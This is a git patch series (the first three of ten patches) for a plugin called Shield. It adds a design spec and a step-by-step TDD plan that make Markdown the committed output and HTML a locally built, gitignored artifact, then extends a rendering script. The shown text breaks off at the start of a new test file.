From bc4546f8fdc9d3b5f4a9e2312f24cbb5f2d713a7 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 13:29:34 +0530
Subject: [PATCH 01/10] =?UTF-8?q?docs(spec):=20single=20canonical=20Shield?=
 =?UTF-8?q?=20output=20=E2=80=94=20Markdown=20source,=20HTML=20as=20build?=
 =?UTF-8?q?=20artifact?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Design spec: Markdown is the one committed/authored output; HTML + site
assets become local, gitignored build artifacts regenerated on demand by a
render-output.sh build script, triggered by a thin /shield render command.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
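Reviewer note (ignored by `git am`, not part of the commit): a minimal sketch of the committed-versus-ignored split described in Design section 1 of the spec. `is_generated` and `GENERATED_ROOT_ASSETS` are hypothetical names introduced here for illustration. The function only approximates the ignore list and is not a substitute for git's own matching.

```python
from pathlib import PurePosixPath

# Generated root-level site assets named in the spec's "Gitignored" list.
GENERATED_ROOT_ASSETS = frozenset({
    "index.html", "manifest.js", "shield.css",
    "shield-nav.js", "shield-dashboard.js",
})


def is_generated(path: str) -> bool:
    """True if a repo-relative POSIX path is a regenerable build artifact.

    Hypothetical helper (assumption): it mirrors the spec's list by hand
    and does not consult .gitignore.
    """
    parts = PurePosixPath(path).parts
    if parts[:2] != ("docs", "shield"):
        return False
    rest = parts[2:]
    if len(rest) == 1:
        # A file directly under docs/shield/: only the listed assets count.
        return rest[0] in GENERATED_ROOT_ASSETS
    # Anything inside a directory named outputs/ is rendered HTML.
    return "outputs" in rest[:-1]
```

Under this sketch `docs/shield/manifest.json` stays committed while `docs/shield/manifest.js` is treated as generated, matching the note in the spec.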
 ...8-shield-single-canonical-output-design.md | 150 ++++++++++++++++++
 1 file changed, 150 insertions(+)
 create mode 100644 docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md

diff --git a/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md
new file mode 100644
index 00000000..54fc0d6d
--- /dev/null
+++ b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md
@@ -0,0 +1,150 @@
+# Shield: one canonical output (Markdown), HTML as a build artifact
+
+**Date:** 2026-06-08
+**Status:** Approved (design) — pending spec review
+**Scope:** Shield plugin output artifacts (`docs/shield/`)
+
+## Problem
+
+Shield writes every artifact twice and commits both:
+
+- `docs/shield/{feature}/*.md` — the authored Markdown
+- `docs/shield/{feature}/outputs/**/*.html` — an HTML mirror, plus generated
+  site assets at the `docs/shield/` root (`index.html`, `manifest.js`,
+  `shield.css`, `shield-nav.js`, `shield-dashboard.js`)
+
+Today 41 HTML files are tracked in git alongside their Markdown. This is
+confusing and wasteful because the HTML carries **no unique information** — it
+is rendered purely from Markdown by `shield/scripts/render-markdown.sh`. The
+real dependency chain is one-way:
+
+```
+JSON sidecar (plan.json, prd.meta.json)   ← structured source of truth
+        ↓ authored or rendered
+Markdown (.md)                            ← canonical human deliverable
+        ↓ render-markdown.sh (pure render)
+HTML (.html) + site assets                ← view-only, regenerable
+```
+
+Committing both means: two parallel trees that must stay in sync, doubled diffs
+on every change, and a standing drift risk (hand-edited HTML, or stale HTML).
+
+## Decision
+
+**Markdown is the single canonical, committed, authored output.** HTML is
+demoted to a **local build artifact** — generated on demand, never committed,
+treated like `dist/`.
+
+Chosen over two alternatives:
+
+- **Keep both committed + CI drift-guard** — rejected; keeps the double tree and
+  doubled diffs, only papers over the smell.
+- **Drop HTML entirely** — rejected; the browsable dashboard (nav, Mermaid,
+  cross-linking) is the real consumer.
+
+Confirmed constraint: people open the HTML **locally** in a browser. Nothing
+hosts/serves the committed `outputs/` tree, so gitignoring HTML costs only a
+"build before you browse" step.
+
+## Design
+
+### 1. What stays committed vs. ignored
+
+**Committed (canonical / source):**
+- All `*.md` under `docs/shield/`
+- All JSON sidecars: `manifest.json`, `plan.json`, `*.meta.json`,
+  `*-comments.json`, `grades.json`
+
+**Gitignored (generated, regenerable):**
+- `docs/shield/**/outputs/` — every rendered per-artifact HTML tree
+- `docs/shield/index.html`
+- `docs/shield/manifest.js`
+- `docs/shield/shield.css`, `docs/shield/shield-nav.js`,
+  `docs/shield/shield-dashboard.js`
+
+Note: `manifest.json` stays committed (it is the index source); `manifest.js`
+is a generated JS mirror and is ignored.
+
+### 2. Remove already-committed HTML
+
+`git rm --cached` the 41 tracked `.html` files plus the tracked root site
+assets (`docs/shield/index.html`, `docs/shield/manifest.js`). Add the
+`.gitignore` rules above in the same commit so they don't reappear.
+
+### 3. Renderers are unchanged
+
+Skills keep calling `render-markdown.sh` and `write_shield_assets.py` exactly as
+they do now. The only difference is the output lands in a gitignored location,
+so it never enters a diff. **No renderer code changes.**
+
+### 4. Build script + thin command trigger
+
+Two pieces, clearly separated:
+
+**A. The build script — `shield/scripts/render-output.sh`** (the orchestrator).
+This is where all the conversion logic lives. Given an optional feature, it
+regenerates the full HTML site from committed Markdown + `manifest.json`:
+
+- No feature arg → rebuild the whole `docs/shield/` site (every feature's
+  `outputs/*.html` + the root dashboard `index.html` and assets).
+- With a feature arg → rebuild just that feature's `outputs/` + refresh the
+  root dashboard/manifest assets.
+
+It is a thin wrapper that drives the **existing** machinery — it loops the
+relevant `.md` files through `render-markdown.sh` and then calls
+`write_shield_assets.py`. It introduces **no new renderer**. Being a standalone
+script, it is runnable and testable on its own (which the eval relies on).
+
+**B. The command — `/shield render [feature]`** (skill). A thin trigger that
+just invokes `render-output.sh [feature]` and reports where the built site is.
+No conversion logic in the command itself.
+
+This is the "build before you browse / share" entry point, run on demand.
+
+### 5. Skill prose / path references
+
+Audit the authoring skills (`research`, `prd-docs`, `plan-docs`, `lld-docs`,
+`prd-review`, `plan-review`, `review`) and the `output-paths.yaml` registry for
+any language that presents the `.html`/`outputs/` paths as *committed
+deliverables*. Update them to describe HTML as a local build artifact and point
+users at `/shield render` to view. Markdown paths remain the deliverables they
+report.
+
+## Out of scope (YAGNI)
+
+- New export formats (PDF, Confluence). Markdown-as-source makes these easy
+  later, but none are built now.
+- Hosting/serving the dashboard. Local-open only.
+- Changing the renderer, shell template, or dashboard behavior.
+- Touching the JSON sidecar schemas.
+
+## Risks / notes
+
+- **Existing clones with committed HTML:** `git rm --cached` keeps the HTML on
+  disk only in the clone that runs it. Pulling the commit deletes the tracked
+  HTML elsewhere, and fresh clones never get it; both run `/shield render`.
+- **"I opened a stale/missing HTML":** mitigated by the explicit `/shield
+  render` step and by the fact that rendering is cheap and idempotent.
+
+## Eval coverage (per CLAUDE.md — mandatory for plugin asset changes)
+
+This touches plugin assets (new `/shield render` command + skill-prose edits),
+so the PR must ship at least one executable eval. Candidate coverage:
+
+- An eval that runs `render-output.sh` directly against a fixture feature with
+  committed `.md` + `manifest.json` and asserts the expected `outputs/*.html`,
+  root `index.html`, and assets are produced (and match a render of the
+  Markdown). Testing the script directly avoids going through the command layer.
+- A repo-hygiene check (eval or test) asserting no `*.html` / generated site
+  assets are tracked under `docs/shield/` and that the `.gitignore` rules cover
+  them.
+
+## Definition of done
+
+1. `.gitignore` updated; 41 `.html` + root site assets untracked.
+2. `render-output.sh` build script added (wraps existing renderers); `/shield
+   render` command added as a thin trigger.
+3. Skill prose + `output-paths.yaml` updated to call HTML a build artifact.
+4. Eval(s) above land in the same PR; RED→GREEN paper trail recorded.
+5. Plugin version bumped in `.claude-plugin/marketplace.json` (and
+   `pyproject.toml` if applicable).

From 1ee3eab00f63a47f6f6f7a09c336be11c5aff6b1 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 13:45:10 +0530
Subject: [PATCH 02/10] docs(plan): implementation plan for single canonical
 Shield output

Six tasks: complete rerender_all coverage (enhanced-*/detailed/*), add
render-output.sh build script, /shield render command, gitignore+untrack HTML,
prose updates, version bump. Each task is TDD with an executable eval.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
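Reviewer note (ignored by `git am`, not part of the commit): the Task 4 build check reads `git status --porcelain` output, where staged deletions (`D `) and untracked files (`??`) appear side by side. A minimal sketch of telling them apart, assuming porcelain v1 lines of the form `XY PATH` with unquoted paths; `untracked_html` is a hypothetical helper, not part of the plan.

```python
def untracked_html(porcelain: str) -> list[str]:
    """Return untracked .html paths from `git status --porcelain` (v1) text.

    Assumption: paths are unquoted (no spaces or special characters).
    """
    paths = []
    for line in porcelain.splitlines():
        # Two status characters, one space, then the path.
        status, path = line[:2], line[3:]
        if status == "??" and path.endswith(".html"):
            paths.append(path)
    return paths
```

An empty result suggests regenerated HTML is being ignored. Git collapses a wholly untracked directory into a single `?? dir/` entry unless `--untracked-files=all` is passed, so a check like this only sees individual files with that flag.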
 ...26-06-08-shield-single-canonical-output.md | 511 ++++++++++++++++++
 1 file changed, 511 insertions(+)
 create mode 100644 docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md

diff --git a/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md
new file mode 100644
index 00000000..08a7c49f
--- /dev/null
+++ b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md
@@ -0,0 +1,511 @@
+# Shield Single Canonical Output Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Make Markdown the single committed Shield output and demote HTML to a locally-built, gitignored artifact regenerated on demand by one build script.
+
+**Architecture:** Reuse the existing renderers. First make the existing `rerender_all.py` *complete* so it regenerates every HTML we currently commit (main docs, review summaries, **and** the `enhanced-*` / `detailed/*` reviewer docs it currently skips). Add a thin `render-output.sh` that runs `rerender_all.py` (pages) then `write_shield_assets.py` (dashboard + assets). Add a `/shield render` command that just triggers the script. Then `.gitignore` all generated HTML/site assets and `git rm --cached` the 41 already-tracked HTML files + root assets. Finally update path-registry/CLAUDE.md prose to call HTML a build artifact.
+
+**Tech Stack:** Bash + Python 3 (stdlib only for orchestration), `uv` for the markdown-it render dependency, `pytest` for evals. All under `shield/scripts/`.
+
+---
+
+## Spec
+
+Design doc: `docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md`
+
+## File Structure
+
+**Modify:**
+- `shield/scripts/rerender_all.py` — extend `rerender_all()` to also render `enhanced-*.md` and `detailed/*.md` review sources. Stays page-rendering only (single responsibility).
+- `.gitignore` — add rules for generated HTML + root site assets.
+- `shield/schema/output-paths.yaml` — header note: `*_html` paths are local build artifacts.
+- `CLAUDE.md` — the artifact-output note (currently says "Rendered HTML lands under …") gains "(build artifact — gitignored; run `/shield render`)".
+
+**Create:**
+- `shield/scripts/render-output.sh` — the build script (orchestrator): `rerender_all.py` + `write_shield_assets.py`.
+- `shield/commands/render.md` — `/shield render` command (thin trigger).
+- `shield/scripts/test_rerender_all.py` — eval: completeness of rendered set.
+- `shield/scripts/test_render_output.py` — eval: end-to-end build produces pages **and** assets.
+- `shield/scripts/test_gitignore_html_artifacts.py` — eval: `.gitignore` covers the generated artifacts.
+
+**Remove from git (keep on disk):**
+- 41 tracked `*.html` under `docs/shield/**/outputs/`, plus `docs/shield/index.html` and `docs/shield/manifest.js`.
+
+---
+
+## Task 1: Make `rerender_all.py` render the complete HTML set
+
+Today `rerender_all.py` renders the five main docs + `reviews/*/*/summary.md` only. It silently skips `enhanced-*.md` and `detailed/*.md`, which ARE committed as HTML today. Fix that so nothing is lost when we stop committing HTML.
+
+**Files:**
+- Create: `shield/scripts/test_rerender_all.py`
+- Modify: `shield/scripts/rerender_all.py` (the `rerender_all` function body, after the existing `summary.md` loop)
+
+- [ ] **Step 1: Write the failing test**
+
+Create `shield/scripts/test_rerender_all.py`:
+
+```python
+"""Eval for rerender_all.py — renders the COMPLETE committed HTML set,
+including enhanced-* and detailed/* review docs (regression: those were skipped)."""
+from __future__ import annotations
+
+import importlib.util
+import json
+import subprocess
+from pathlib import Path
+
+SPEC = Path(__file__).resolve().parent / "rerender_all.py"
+_spec = importlib.util.spec_from_file_location("rerender_all", SPEC)
+ra = importlib.util.module_from_spec(_spec)
+_spec.loader.exec_module(ra)
+
+
+def _fixture(root: Path) -> None:
+    """A feature with a main doc + a plan review that has summary, enhanced, detailed."""
+    feat = root / "feat-x"
+    (feat).mkdir(parents=True)
+    (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []}))
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+    rev = feat / "reviews" / "plan" / "2026-06-08"
+    (rev / "detailed").mkdir(parents=True)
+    (rev / "summary.md").write_text("# Summary\n\nbody\n")
+    (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n")
+    (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n")
+
+
+def test_renders_enhanced_and_detailed(tmp_path):
+    _fixture(tmp_path)
+    rc = ra.rerender_all(tmp_path)
+    assert rc == 0
+    out = tmp_path / "feat-x" / "outputs"
+    expected = [
+        out / "prd.html",
+        out / "reviews" / "plan" / "2026-06-08" / "summary.html",
+        out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html",
+        out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html",
+    ]
+    for p in expected:
+        assert p.is_file(), f"missing rendered page: {p}"
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v`
+Expected: FAIL — `enhanced-plan.html` and `detailed/agile-coach.html` are missing (rerender_all skips them today).
+
+- [ ] **Step 3: Add the enhanced + detailed render loops**
+
+In `shield/scripts/rerender_all.py`, inside `rerender_all()`, immediately AFTER this existing block:
+
+```python
+        for summary in feature.glob("reviews/*/*/summary.md"):
+            rel = summary.relative_to(feature).with_suffix(".html")
+            _render(summary, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+```
+
+add:
+
+```python
+        for enhanced in feature.glob("reviews/*/*/enhanced-*.md"):
+            rel = enhanced.relative_to(feature).with_suffix(".html")
+            _render(enhanced, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+        for detailed in feature.glob("reviews/*/*/detailed/*.md"):
+            rel = detailed.relative_to(feature).with_suffix(".html")
+            _render(detailed, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+```
+
+- [ ] **Step 4: Run test to verify it passes**
+
+Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v`
+Expected: PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add shield/scripts/rerender_all.py shield/scripts/test_rerender_all.py
+git commit -m "fix(shield): rerender_all renders enhanced-* and detailed/* review docs"
+```
+
+---
+
+## Task 2: Create `render-output.sh` build script
+
+The orchestrator: it renders all pages, then writes the dashboard + shared assets. Idempotent.
+
+**Files:**
+- Create: `shield/scripts/render-output.sh`
+- Create: `shield/scripts/test_render_output.py`
+
+- [ ] **Step 1: Write the failing test**
+
+Create `shield/scripts/test_render_output.py`:
+
+```python
+"""Eval for render-output.sh — the full build: pages + dashboard assets."""
+from __future__ import annotations
+
+import json
+import subprocess
+from pathlib import Path
+
+SCRIPT = Path(__file__).resolve().parent / "render-output.sh"
+
+
+def test_build_produces_pages_and_assets(tmp_path):
+    feat = tmp_path / "feat-x"
+    feat.mkdir(parents=True)
+    (tmp_path / "manifest.json").write_text(
+        json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]})
+    )
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+
+    res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True)
+    assert res.returncode == 0, res.stderr
+
+    # pages
+    assert (feat / "outputs" / "prd.html").is_file()
+    # dashboard + shared assets
+    for asset in ["manifest.js", "index.html", "shield.css",
+                  "shield-nav.js", "shield-dashboard.js"]:
+        assert (tmp_path / asset).is_file(), f"missing asset {asset}"
+
+
+def test_missing_dir_errors(tmp_path):
+    res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")],
+                         capture_output=True, text=True)
+    assert res.returncode == 2
+    assert "not a dir" in res.stderr
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v`
+Expected: FAIL — `render-output.sh` does not exist yet.
+
+- [ ] **Step 3: Write the build script**
+
+Create `shield/scripts/render-output.sh`:
+
+```bash
+#!/usr/bin/env bash
+# Build the full Shield HTML site from committed Markdown.
+#
+# Step 1: render every source .md to its outputs/*.html (rerender_all.py)
+# Step 2: write the dashboard + shared assets (write_shield_assets.py)
+#
+# HTML is a build artifact: it is gitignored and regenerated on demand.
+# Markdown + JSON sidecars are the committed source of truth.
+#
+# Usage:
+#   render-output.sh [OUTPUT_DIR]
+#     OUTPUT_DIR defaults to <repo-root>/docs/shield
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+OUTPUT_DIR="${1:-}"
+if [[ -z "$OUTPUT_DIR" ]]; then
+  ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)"
+  OUTPUT_DIR="$ROOT/docs/shield"
+fi
+
+if [[ ! -d "$OUTPUT_DIR" ]]; then
+  echo "render-output: not a dir: $OUTPUT_DIR" >&2
+  exit 2
+fi
+
+python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR"
+python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR"
+echo "render-output: site built at $OUTPUT_DIR"
+```
+
+- [ ] **Step 4: Make it executable**
+
+Run: `chmod +x shield/scripts/render-output.sh`
+Expected: no output (the repo's pre-commit "scripts with shebangs are executable" hook requires this).
+
+- [ ] **Step 5: Run test to verify it passes**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v`
+Expected: PASS (both tests)
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add shield/scripts/render-output.sh shield/scripts/test_render_output.py
+git commit -m "feat(shield): render-output.sh — one build script for the HTML site"
+```
+
+---
+
+## Task 3: Add the `/shield render` command
+
+A thin trigger. No logic — it invokes `render-output.sh`.
+
+**Files:**
+- Create: `shield/commands/render.md`
+
+- [ ] **Step 1: Write the command**
+
+Create `shield/commands/render.md` (mirrors the frontmatter style of `shield/commands/analyze-plan.md`):
+
+```markdown
+---
+name: render
+description: Build the browsable Shield HTML site locally from committed Markdown
+args: "[output dir — optional, defaults to docs/shield]"
+---
+
+# Render Shield Output
+
+Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the
+browsable dashboard) is a **local build artifact** — gitignored and regenerated
+on demand. Run this command to (re)build the site, then open the HTML locally.
+
+## Usage
+
+`/shield render` — rebuild the whole site under `docs/shield/`
+`/shield render <output dir>` — rebuild a site rooted at a custom dir
+
+## Behavior
+
+1. Run the build script, which renders every source `.md` to its
+   `outputs/*.html` and then writes the dashboard (`index.html`) and shared
+   assets (`manifest.js`, CSS, nav JS):
+
+   ```bash
+   "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS"
+   ```
+
+   (`$ARGUMENTS` is empty for the default `docs/shield/` location.)
+
+2. Report the built site path and remind the user the output is gitignored —
+   open `docs/shield/index.html` in a browser to view.
+
+## Important
+
+- This command does NOT author or modify any Markdown — it only renders.
+- HTML is never committed; do not `git add` anything under `outputs/` or the
+  generated root assets.
+```
+
+- [ ] **Step 2: Verify the command file parses (frontmatter present)**
+
+Run: `head -6 shield/commands/render.md`
+Expected: shows the `---` frontmatter block with `name: render`.
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add shield/commands/render.md
+git commit -m "feat(shield): /shield render command triggers render-output.sh"
+```
+
+---
+
+## Task 4: Gitignore generated HTML and untrack the committed files
+
+**Files:**
+- Modify: `.gitignore`
+- Create: `shield/scripts/test_gitignore_html_artifacts.py`
+- Remove from index: tracked `*.html` + root assets under `docs/shield/`
+
+- [ ] **Step 1: Write the failing hygiene test**
+
+Create `shield/scripts/test_gitignore_html_artifacts.py`:
+
+```python
+"""Eval: .gitignore demotes Shield HTML to a build artifact."""
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[2]  # repo root
+GITIGNORE = ROOT / ".gitignore"
+
+REQUIRED_PATTERNS = [
+    "**/docs/shield/*/outputs/",
+    "**/docs/shield/index.html",
+    "**/docs/shield/manifest.js",
+]
+
+
+def test_gitignore_has_html_artifact_rules():
+    text = GITIGNORE.read_text()
+    for pat in REQUIRED_PATTERNS:
+        assert pat in text, f".gitignore missing rule: {pat}"
+
+
+def test_no_shield_html_tracked():
+    out = subprocess.run(
+        ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/index.html", "docs/shield/manifest.js"],
+        cwd=ROOT, capture_output=True, text=True,
+    )
+    tracked = [l for l in out.stdout.splitlines() if l.strip()]
+    assert tracked == [], f"HTML/assets still tracked: {tracked}"
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v`
+Expected: FAIL — patterns absent and 41+ HTML files still tracked.
+
+- [ ] **Step 3: Add the `.gitignore` rules**
+
+Append to `.gitignore` (after the existing `**/docs/shield/*/.session-transcript.md` block):
+
+```gitignore
+# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are
+# the committed source of truth. Regenerate the site locally with /shield
+# render (scripts/render-output.sh). See docs/superpowers/specs/
+# 2026-06-08-shield-single-canonical-output-design.md
+**/docs/shield/*/outputs/
+**/docs/shield/index.html
+**/docs/shield/manifest.js
+**/docs/shield/shield.css
+**/docs/shield/shield-nav.js
+**/docs/shield/shield-dashboard.js
+```
+
+- [ ] **Step 4: Untrack the already-committed HTML + root assets (keep on disk)**
+
+Run:
+
+```bash
+git ls-files -z \
+  'docs/shield/*/outputs/**' \
+  'docs/shield/index.html' \
+  'docs/shield/manifest.js' \
+  'docs/shield/shield.css' \
+  'docs/shield/shield-nav.js' \
+  'docs/shield/shield-dashboard.js' \
+  | xargs -0 --no-run-if-empty git rm --cached --quiet
+```
+
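+Expected: no output, because `--quiet` suppresses the per-file `rm` lines. `git status --short docs/shield` then shows the staged deletions (≈41 html + index.html + manifest.js). Files remain on disk; only the index entries are dropped.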
+
+- [ ] **Step 5: Run test to verify it passes**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v`
+Expected: PASS (both tests)
+
+- [ ] **Step 6: Verify the build still reproduces what was removed**
+
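+Run: `shield/scripts/render-output.sh` then `git status --porcelain --untracked-files=all docs/shield | grep -c '^?? .*\.html$' || true`
+Expected: `0`. Regenerated HTML is ignored (never listed as untracked `??`), proving the build replaces the removed committed files. The `^??` anchor skips the staged deletions (`D `) that Step 4 leaves in the index until Step 7 commits.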
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add .gitignore shield/scripts/test_gitignore_html_artifacts.py
+git commit -m "build(shield): gitignore HTML build artifacts; untrack committed HTML"
+```
+
+---
+
+## Task 5: Update path-registry + artifact-output prose
+
+Stop describing HTML as a committed deliverable; point readers at `/shield render`. The "Rendered HTML lands under …" phrasing lives in exactly three places (confirmed by grep): `shield/hooks/scripts/session-start.sh`, `shield/docs/artifacts.md`, `shield/skills/general/manifest-schema.md`. The per-skill render steps still run unchanged — they just produce gitignored output.
+
+**Files:**
+- Modify: `shield/schema/output-paths.yaml` (top-of-file header comment)
+- Modify: `shield/hooks/scripts/session-start.sh`
+- Modify: `shield/docs/artifacts.md`
+- Modify: `shield/skills/general/manifest-schema.md`
+
+- [ ] **Step 1: Add a header note to `output-paths.yaml`**
+
+At the very top of `shield/schema/output-paths.yaml`, add (above the first existing line):
+
+```yaml
+# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and
+# regenerated on demand by /shield render (scripts/render-output.sh). The
+# committed source of truth is the corresponding Markdown (+ JSON sidecars).
+```
+
+- [ ] **Step 2: Inspect the three "Rendered HTML lands under" call-sites**
+
+Run: `grep -n "Rendered HTML lands under" shield/hooks/scripts/session-start.sh shield/docs/artifacts.md shield/skills/general/manifest-schema.md`
+Expected: one matching line per file. Read each line's surrounding sentence so the edit in Step 3 matches the exact existing text.
+
+- [ ] **Step 3: Append the build-artifact parenthetical in each of the three files**
+
+In each file, edit the sentence that begins "Rendered HTML lands under `docs/shield/{feature}/outputs/`" so it ends with the parenthetical. The target sentence must read:
+
+```
+Rendered HTML lands under `docs/shield/{feature}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`).
+```
+
+(Preserve each file's surrounding punctuation/markup; only insert the ` (build artifact — gitignored; rebuild locally with `/shield render`)` clause before the trailing period.)
+
+- [ ] **Step 4: Grep for any remaining "committed HTML" phrasing**
+
+Run: `grep -rniE "commit.*\.html|html.*deliverable" shield/ || echo "none"`
+Expected: `none` (no prose describing HTML as committed).
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add shield/schema/output-paths.yaml shield/hooks/scripts/session-start.sh \
+        shield/docs/artifacts.md shield/skills/general/manifest-schema.md
+git commit -m "docs(shield): describe HTML output as a gitignored build artifact"
+```
+
+---
+
+## Task 6: Version bump
+
+Per CLAUDE.md: bump the plugin version in `marketplace.json` for any plugin change. Shield has no root `pyproject.toml` (only `shield/backlog/` and `shield/parsers/` have them, untouched here), so only `marketplace.json` changes.
+
+**Files:**
+- Modify: `.claude-plugin/marketplace.json` (shield `version`)
+
+- [ ] **Step 1: Bump shield version**
+
+In `.claude-plugin/marketplace.json`, change the `shield` entry `"version": "2.27.0"` to `"version": "2.28.0"` (minor bump — new command + behavior change).
+
+- [ ] **Step 2: Verify JSON is valid**
+
+Run: `python3 -m json.tool .claude-plugin/marketplace.json > /dev/null && echo OK`
+Expected: `OK`
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add .claude-plugin/marketplace.json
+git commit -m "chore(shield): bump to 2.28.0 — Markdown-canonical output + /shield render"
+```
+
+---
+
+## Final verification (run before opening PR)
+
+- [ ] **Run the full new eval set:**
+
+Run:
+```bash
+cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" \
+  pytest test_rerender_all.py test_render_output.py test_gitignore_html_artifacts.py -v
+```
+Expected: all PASS.
+
+- [ ] **Confirm no HTML is tracked and the build regenerates cleanly:**
+
+Run:
+```bash
+git ls-files 'docs/shield/**/*.html' 'docs/shield/index.html' | wc -l   # expect 0
+shield/scripts/render-output.sh
+git status --porcelain docs/shield | grep '\.html$' || echo "clean (html ignored)"
+```
+Expected: `0`, then `clean (html ignored)`.
+
+- [ ] **PR body notes:** the `/shield render` command is a thin trigger fully exercised by `test_render_output.py`; completeness regression covered by `test_rerender_all.py`; repo hygiene by `test_gitignore_html_artifacts.py`. No `pyproject.toml` bump (shield root has none).

From 72b3596680281ff76783978b83e1c8b23ff4086e Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:25:05 +0000
Subject: [PATCH 03/10] fix(shield): rerender_all renders enhanced-* and
 detailed/* review docs

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
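Reviewer note (ignored by `git am`, not part of the commit): a minimal sketch of the source-to-output mapping the two new loops rely on, assuming the directory layout used by the test fixture. `planned_outputs` and `REVIEW_GLOBS` are hypothetical names, not part of `rerender_all.py`; the helper only computes paths and renders nothing.

```python
from pathlib import Path

# Glob patterns for review docs, copied from the loops in rerender_all().
REVIEW_GLOBS = (
    "reviews/*/*/summary.md",
    "reviews/*/*/enhanced-*.md",
    "reviews/*/*/detailed/*.md",
)


def planned_outputs(feature: Path) -> list[Path]:
    """Return the HTML path each review source would render to.

    Hypothetical helper (assumption): it mirrors the relative_to() and
    with_suffix() mapping used in the loops, without calling _render().
    """
    outputs = []
    for pattern in REVIEW_GLOBS:
        for source in sorted(feature.glob(pattern)):
            rel = source.relative_to(feature).with_suffix(".html")
            outputs.append(feature / "outputs" / rel)
    return outputs
```

Each source keeps its path relative to the feature directory, so `reviews/plan/2026-06-08/detailed/agile-coach.md` would land at `outputs/reviews/plan/2026-06-08/detailed/agile-coach.html`, the same location the new test asserts.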
 shield/scripts/rerender_all.py      | 10 +++++++
 shield/scripts/test_rerender_all.py | 41 +++++++++++++++++++++++++++++
 2 files changed, 51 insertions(+)
 create mode 100644 shield/scripts/test_rerender_all.py

diff --git a/shield/scripts/rerender_all.py b/shield/scripts/rerender_all.py
index b1f82783..b2890d86 100755
--- a/shield/scripts/rerender_all.py
+++ b/shield/scripts/rerender_all.py
@@ -50,6 +50,16 @@ def rerender_all(output_dir: Path) -> int:
             _render(summary, feature / "outputs" / rel,
                     f"Review — {feature.name}", output_dir)
             count += 1
+        for enhanced in feature.glob("reviews/*/*/enhanced-*.md"):
+            rel = enhanced.relative_to(feature).with_suffix(".html")
+            _render(enhanced, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+        for detailed in feature.glob("reviews/*/*/detailed/*.md"):
+            rel = detailed.relative_to(feature).with_suffix(".html")
+            _render(detailed, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
     print(f"rerender_all: rendered {count} page(s)")
     return 0
 
diff --git a/shield/scripts/test_rerender_all.py b/shield/scripts/test_rerender_all.py
new file mode 100644
